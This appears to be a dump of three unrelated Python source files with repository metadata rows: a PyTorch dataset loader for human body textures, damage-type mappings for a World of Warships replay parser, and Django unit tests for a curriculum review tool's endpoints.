def __getitem__(self, index):
label = self.filelist[index][1]
name = self.filelist[index][0]
folder = self.folders[label]
if self.stage == 'pretrain' or self.stage == 'train':
image = self.loader(os.path.join(folder, "image", name+".jpg"), mode="RGB")
body = self.loader(os.path.join(folder, "body", name+".png"), mode="L")
foreground = self.loader(os.path.join(folder, "segmentation", name+".jpg"), mode="L")
image_index = random.randrange(0, len(self.filelists[label]))
image_name = self.filelists[label][image_index][0]
class_image = self.loader(os.path.join(folder, "image", image_name+".jpg"), mode="RGB")
class_foreground = self.loader(os.path.join(folder, "segmentation", image_name+".jpg"), mode="L")
class_body = self.loader(os.path.join(folder, "body", image_name+".png"), mode="L")
IUV = self.loader(os.path.join(folder, "densepose", name+".png") , mode="RGB")
# IUV = imageio.imread(iuv_p)
#
# print (np.asarray(IUV).shape)
# print (np.unique(np.asarray(IUV)))
# print (np.unique(np.asarray(IUV)[:, :, 0]))
# print (np.unique(np.asarray(IUV)[:, :, 1]))
# print (np.unique(np.asarray(IUV)[:, :, 2]))
# transform_iuv = self._transform([IUV], [True] )[0]
# print (transform_iuv.shape)
# print (np.unique(transform_iuv[0, :, :]))
# print (np.unique(transform_iuv[1, :, :]))
# print (np.unique(transform_iuv[2, :, :]))
#
# exit()
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground, IUV], [False, False, True, True, True, True, True])
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground", "IUV"]
data=dict(zip(data_name, transform_output))
data["mask"] = data["IUV"][-1,:,:]
# print (np.unique(data['mask'], return_counts=True), ' unique mask')
# print (data["IUV"][-1, :, :].shape)
data["foreground"] = (data["foreground"] > 0).to(torch.long)
data["U"] = data["IUV"][1,:,:].unsqueeze(0).to(torch.float32)/self.config["URange"]
data["V"] = data["IUV"][0,:,:].unsqueeze(0).to(torch.float32)/self.config["VRange"]
data.pop("IUV")
# print (np.unique(data['mask']), ' unique mask')
# exit()
if self.stage == 'pretrain_texture':
data = {}
textures = []
texture = self.loader(os.path.join(folder, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
indexes = random.sample(list(range(0, len(self.filelists[label]))), self.config["num_texture"]-1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
if self.stage == 'train':
indexes = random.sample(list(range(0, len(self.filelists[label]))), 1)
for i in indexes:
name = self.filelists[label][i][0]
texture = self.loader(os.path.join(folder, "texture", name+".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1]//4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24*3, texture_size, texture_size)
data["texture"] = texture_tensor.unsqueeze(0)
data["class"] = label
return data
class ValidationTransferDataSet(BaseDataSet):
def __init__(self, root, src_root, config, list_name="image_list.txt"):
super(ValidationTransferDataSet, self).__init__(config)
self.root = root
self.src_root = src_root
with open(os.path.join(root, list_name)) as f:
filelist = f.readlines()
filelist.sort(key=int)
filelist = [x.strip() for x in filelist]
self.filelist = filelist
with open(os.path.join(src_root, list_name)) as f:
filelist = f.readlines()
filelist = [x.strip() for x in filelist]
self.src_filelist = filelist
self.size = self.config['resize']
self.stage = self.config['phase']
def __len__(self):
return len(self.filelist)
def loader(self, path, mode):
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert(mode)
def label_to_tensor(self, label):
if isinstance(label, np.ndarray):
return torch.from_numpy(label)
else:
return (F.to_tensor(label) * 255.0).type(torch.long)
def _transform(self, images, tolabel):
if 'resize' in self.config:
old_size, _ = images[0].size
size = [self.config['resize'], self.config['resize']]
resize = transforms.Resize(size, Image.NEAREST)
for i in range(len(images)):
images[i] = resize(images[i])
for i in range(len(images)):
if tolabel[i]:
images[i] = self.label_to_tensor(images[i])
else:
images[i] = F.to_tensor(images[i])
return images
def __getitem__(self, index):
name = self.filelist[index]
root = self.root
src_root = self.src_root
image = self.loader(os.path.join(root, "image", name + ".png"), mode="RGB")
# print (image)
body = self.loader(os.path.join(root, "body", name + ".png"), mode="L")
# print (body)
foreground = self.loader(os.path.join(root, "segmentation", name + ".png"), mode="L")
# print (foreground)
class_image = self.loader(os.path.join(src_root, "image", self.src_filelist[0] + ".jpg"), mode="RGB")
# print (class_image)
class_foreground = self.loader(os.path.join(src_root, "segmentation", self.src_filelist[0] + ".jpg"), mode="L")
# print (class_foreground)
class_body = self.loader(os.path.join(src_root, "body", self.src_filelist[0] + ".png"), mode="L")
# print (class_body)
transform_output = self._transform([image, class_image, body, class_body, foreground, class_foreground], [False, False, True, True, True, True])
# print (transform_output)
data_name = ["image", "class_image", "body", "class_body", "foreground", "class_foreground"]
data = dict(zip(data_name, transform_output))
data["foreground"] = (data["foreground"] > 0).to(torch.long)
textures = []
indexes = random.sample(list(range(0, len(self.src_filelist))), min(self.config["num_texture"],len(self.src_filelist)) )
# indexes = random.sample(list(range(0, len(self.src_filelist))), self.config["num_texture"])
for i in indexes:
name = self.src_filelist[i]
texture = self.loader(os.path.join(src_root, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
data["class"] = 0
return data
| 41.140351
| 167
| 0.573324
| 2,599
| 21,105
| 4.509427
| 0.060793
| 0.088737
| 0.038396
| 0.046416
| 0.904778
| 0.879266
| 0.865529
| 0.853157
| 0.843345
| 0.843345
| 0
| 0.015767
| 0.281782
| 21,105
| 512
| 168
| 41.220703
| 0.757422
| 0.050272
| 0
| 0.808743
| 0
| 0
| 0.058521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062842
| false
| 0
| 0.027322
| 0.010929
| 0.161202
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
830cd6616e1ed15e089bbdc6c1a332394f8bd74d
| 3,327
|
py
|
Python
|
BigWorld/DamageCollection.py
|
kagurazakasanae/wows_replay_parser
|
8b9067b82fd898a35f0f7c54d05b7cf4919ac11d
|
[
"MIT"
] | 4
|
2020-03-16T16:07:39.000Z
|
2021-12-28T00:09:28.000Z
|
BigWorld/DamageCollection.py
|
kagurazakasanae/wows_replay_parser
|
8b9067b82fd898a35f0f7c54d05b7cf4919ac11d
|
[
"MIT"
] | null | null | null |
BigWorld/DamageCollection.py
|
kagurazakasanae/wows_replay_parser
|
8b9067b82fd898a35f0f7c54d05b7cf4919ac11d
|
[
"MIT"
] | 1
|
2020-07-16T22:44:35.000Z
|
2020-07-16T22:44:35.000Z
|
from BigWorld.BaseCollection import *
from BigWorld.DamageType import *
class DamageCollection(BaseCollection):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_BOMB,
11:DAMAGE_AVIA_TORPEDO,
16:DAMAGE_FIRE,
17:DAMAGE_RAM,
19:DAMAGE_SINK}
def set(self, itemCode, value):
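# The incoming values appear to be cumulative damage counters: a damage type is
# stored on first sight, and afterwards only ever raised to a larger value;
# DAMAGE_ALL is bumped by the same increment so it stays the sum of all types.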
if itemCode not in self._items:
super(DamageCollection, self).set(itemCode, value)
super(DamageCollection, self).add(DAMAGE_ALL, value)
elif self._items[itemCode] < value:
prevValue = self.get(itemCode)
super(DamageCollection, self).set(itemCode, value)
super(DamageCollection, self).add(DAMAGE_ALL, value - prevValue)
class DamageCollection_0_6_12(DamageCollection):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
11:DAMAGE_AVIA_BOMB,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK}
class DamageCollection_0_6_13(DamageCollection):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_BOMB_AP,
11:DAMAGE_AVIA_BOMB_HE,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK}
def set(self, itemCode, value):
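# From 0.6.13 bomb damage appears to be reported separately as AP and HE (see
# getMap above); the parent set() still maintains per-type maxima and
# DAMAGE_ALL, while the extra add() calls below fold both kinds into a
# combined DAMAGE_AVIA_BOMB total.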
if itemCode not in self._items:
super(DamageCollection_0_6_13, self).set(itemCode, value)
if itemCode == DAMAGE_AVIA_BOMB_AP or itemCode == DAMAGE_AVIA_BOMB_HE:
super(DamageCollection_0_6_13, self).add(DAMAGE_AVIA_BOMB, value)
elif self._items[itemCode] < value:
prevValue = self.get(itemCode)
super(DamageCollection_0_6_13, self).set(itemCode, value)
if itemCode == DAMAGE_AVIA_BOMB_AP or itemCode == DAMAGE_AVIA_BOMB_HE:
super(DamageCollection_0_6_13, self).add(DAMAGE_AVIA_BOMB, value - prevValue)
class DamageCollection_0_8_0(DamageCollection_0_6_13):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_ROCKET,
11:DAMAGE_AVIA_BOMB,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK,
28:DAMAGE_ROCKET}
class DamageCollection_0_8_2(DamageCollection_0_8_0):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_BOMB_AP,
11:DAMAGE_AVIA_BOMB_HE,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK,
27:DAMAGE_AVIA_BOMB,
28:DAMAGE_AVIA_ROCKET,
32:DAMAGE_MAIN_CS}
| 31.990385
| 98
| 0.60024
| 409
| 3,327
| 4.506112
| 0.144254
| 0.113945
| 0.106348
| 0.065111
| 0.837222
| 0.803581
| 0.803581
| 0.803581
| 0.803581
| 0.803581
| 0
| 0.056
| 0.323715
| 3,327
| 103
| 99
| 32.300971
| 0.763111
| 0
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08046
| false
| 0
| 0.022989
| 0.057471
| 0.218391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83341c89a6762e547b5acf173eb819f610c73850
| 15,575
|
py
|
Python
|
crtool/tests/test_views.py
|
cfpb/curriculum-review-tool
|
3c55a55521078dadaa58439dcbfd564b54c43871
|
[
"CC0-1.0"
] | 3
|
2020-07-21T02:59:52.000Z
|
2021-08-18T18:42:48.000Z
|
crtool/tests/test_views.py
|
cfpb/curriculum-review-tool
|
3c55a55521078dadaa58439dcbfd564b54c43871
|
[
"CC0-1.0"
] | 6
|
2020-08-17T20:01:11.000Z
|
2021-05-04T19:58:39.000Z
|
crtool/tests/test_views.py
|
cfpb/curriculum-review-tool
|
3c55a55521078dadaa58439dcbfd564b54c43871
|
[
"CC0-1.0"
] | 1
|
2021-02-20T10:29:35.000Z
|
2021-02-20T10:29:35.000Z
|
import json
from django.test import RequestFactory, TestCase
from django.urls import reverse
from crtool.views import (
continue_review,
create_review,
get_review,
update_review,
)
class CreateReviewTest(TestCase):
def setUp(self):
self.factory = RequestFactory()
def post(self, post, ajax=False):
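# RequestFactory passes extra keyword arguments through to request.META, so
# HTTP_X_REQUESTED_WITH="XMLHttpRequest" makes the view treat the call as AJAX;
# with content_type="application/json" the dict is sent as a JSON request body.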
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"} if ajax else {}
kwargs['content_type'] = "application/json"
request = self.factory.post(reverse("create_review"), post, **kwargs)
return create_review(request)
def assertBadRequest(self, response, content=None):
self.assertEqual(response.status_code, 400)
if content:
self.assertEqual(response.content, content)
def assertCreateSuccess(self, response, compare={}, content=None):
data = json.loads(response.content.decode("utf-8"))
for k, v in compare.items():
if not self.assertEqual(data[k], compare[k]):
return False
return True
def check_post(self, post, response_check, ajax=False, compare={}, content=None): # noqa 501
if compare:
response_check(self.post(post, ajax=ajax), compare=compare, content=content) # noqa 501
else:
response_check(self.post(post, ajax=ajax), content=content)
def test_invalid_json(self):
kwargs = {
"HTTP_X_REQUESTED_WITH": "XMLHttpRequest",
"content_type": "application/json",
}
request = self.factory.post(
reverse("create_review"),
"invalid:json}",
**kwargs)
self.assertBadRequest(create_review(request), b"Invalid JSON")
def test_missing_title(self):
post = {
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_empty_title(self):
post = {
"tdp-crt_title": "",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_long_title(self):
post = {
"tdp-crt_title": "Test title" * 100,
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, content=b"Too Large")
def test_missing_grade_level(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_empty_grade_level(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_create(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
compare = {
"curriculumTitle": "Test title",
"publicationDate": "Jan 1, 2001",
"gradeRange": "Elementary school",
"pass_code": "P455W0RD"
}
self.check_post(post, self.assertCreateSuccess, compare=compare)
def test_missing_pubdate_and_passcode(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare)
def test_empty_pubdate_and_passcode(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pubdate": "",
"tdp-crt_pass_code": ""
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare)
def test_missing_title_ajax(self):
post = {
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_empty_title_ajax(self):
post = {
"tdp-crt_title": "",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_missing_grade_level_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_empty_grade_level_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_create_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
compare = {
"curriculumTitle": "Test title",
"publicationDate": "Jan 1, 2001",
"gradeRange": "Elementary school",
"pass_code": "P455W0RD"
}
self.check_post(post, self.assertCreateSuccess, ajax=True, compare=compare) # noqa 501
def test_missing_pubdate_and_passcode_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare, ajax=True) # noqa 501
def test_empty_pubdate_and_passcode_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pubdate": "",
"tdp-crt_pass_code": ""
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare, ajax=True) # noqa 501
class GetReviewTest(TestCase):
fixtures = ['crtool_initial_data']
def setUp(self):
self.factory = RequestFactory()
def post(self, post, ajax=False):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"} if ajax else {}
request = self.factory.post(reverse("get_review"), post, **kwargs)
return get_review(request)
def check_post(self, post, response_check, compare={}):
if compare:
response_check(self.post(post), compare=compare)
else:
response_check(self.post(post))
def assertPageNotFound(self, response):
self.assertEqual(response.status_code, 404)
def assertGetSuccess(self, response, compare={}):
data = json.loads(response.content.decode("utf-8"))
for k, v in compare.items():
if not self.assertEqual(data[k], compare[k]):
return False
return True
# Test with token id that exists
def test_existing_id(self):
post = {
"token": "02d19cc1314747ef8aacb3",
}
compare = {
"id": "02d19cc1314747ef8aacb3",
"START": "Quality",
"pass_code": "",
"gradeRange": "High school",
"last_updated": "2020-08-06T00:59:22.576547+00:00",
"quality_status": "in progress",
"curriculumTitle": "Test",
"publicationDate": "",
"ls_modified_time": "2020-08-06T00:58:28.817Z",
"criterionClickedTitles": "{\"quality-crt-question-2\":\"clicked\"}", # noqa 501
"dimensionOverallScores": "{\"Quality\":\"limited\"}",
}
self.check_post(post, self.assertGetSuccess, compare=compare)
# Test with token id that doesn't exist
def test_non_existent_id(self):
post = {
"token": "02d19cc1314747ef8aacbz"
}
self.check_post(post, self.assertPageNotFound)
# Test with null
def test_null(self):
post = {
}
self.check_post(post, self.assertPageNotFound)
# Test with empty string
def test_empty_id(self):
post = {
"token": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with short fake token id
def test_invalid_id(self):
post = {
"token": "apple"
}
self.check_post(post, self.assertPageNotFound)
class UpdateReviewTest(TestCase):
fixtures = ['crtool_initial_data']
def setUp(self):
self.factory = RequestFactory()
def post(self, post, ajax=False):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"} if ajax else {}
kwargs['content_type'] = "application/json"
request = self.factory.post(reverse("update_review"), post, **kwargs)
return update_review(request)
def assertBadRequest(self, response, content=None):
self.assertEqual(response.status_code, 400)
if content:
self.assertEqual(response.content, content)
def assertPageNotFound(self, response, content=None):
self.assertEqual(response.status_code, 404)
def assertUpdateSuccess(self, response, compare={}, content=None):
data = json.loads(response.content.decode("utf-8"))
# Return False if updated review doesn't match comparison.
for k, v in compare.items():
if not self.assertEqual(data[k], compare[k]):
return False
# Return False if the last_updated date isn't updated.
if not self.assertGreater(data['last_updated'], compare['last_updated']): # noqa 501
return False
return True
def check_post(self, post, response_check, ajax=False, compare={}, content=None): # noqa 501
if compare:
response_check(self.post(post, ajax=ajax), compare=compare, content=content) # noqa 501
else:
response_check(self.post(post, ajax=ajax), content=content)
def test_invalid_json(self):
kwargs = {
"HTTP_X_REQUESTED_WITH": "XMLHttpRequest",
"content_type": "application/json",
}
request = self.factory.post(
reverse("update_review"),
"invalid:json}",
**kwargs)
self.assertBadRequest(update_review(request), b"Invalid JSON")
# Test with token id that exists
def test_update_title(self):
post = {
"id": "242449c9251243c1b512d2",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertUpdateSuccess, compare=post)
# Test with token id that doesn't exist
def test_non_existent_id(self):
post = {
"id": "6893d3af8eb54e74a27883",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with null token id
def test_null_id(self):
post = {
"id": None,
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with missing token id
def test_missing_id(self):
post = {
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with empty string token id
def test_empty_id(self):
post = {
"id": "",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with fake token id
def test_invalid_id(self):
post = {
"id": "apple",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
def test_overly_large_body(self):
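# The update view presumably enforces a body-size cap somewhere between the two
# payloads below: ~490,000 characters of junk should still update the review,
# while ~500,000 should be rejected with 400 "Too Large".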
post = {
"id": "242449c9251243c1b512d2",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": "",
"junk": "0123456789" * 49000,
}
self.check_post(post, self.assertUpdateSuccess, compare=post)
post["junk"] = "0123456789" * 50000
self.check_post(post, self.assertBadRequest, content=b"Too Large")
# Test empty post
def test_empty_post(self):
post = {}
self.check_post(post, self.assertPageNotFound)
# Test empty post
def test_null_post(self):
post = None
self.check_post(post, self.assertPageNotFound)
class ContinueReviewTest(TestCase):
fixtures = ['crtool_initial_data']
def setUp(self):
self.factory = RequestFactory()
def post(self, post):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"}
request = self.factory.post(reverse("continue_review"), post, **kwargs) # noqa 501
return continue_review(request)
def test_non_existent_pass_code(self):
post = {
"access_code": "fakefake",
}
response = self.post(post)
self.assertEqual(response.status_code, 404)
def test_found_pass_code(self):
post = {
"access_code": "1da8305db6774e46970ec3",
}
response = self.post(post)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "../tool/#id=1da8305db6774e46970ec3")
| 33.56681
| 100
| 0.575345
| 1,630
| 15,575
| 5.328834
| 0.102454
| 0.03592
| 0.044209
| 0.058715
| 0.82892
| 0.806931
| 0.772853
| 0.745913
| 0.723808
| 0.683974
| 0
| 0.048637
| 0.300353
| 15,575
| 463
| 101
| 33.639309
| 0.748463
| 0.034928
| 0
| 0.667532
| 0
| 0
| 0.245185
| 0.037388
| 0
| 0
| 0
| 0
| 0.135065
| 1
| 0.132468
| false
| 0.085714
| 0.01039
| 0
| 0.18961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|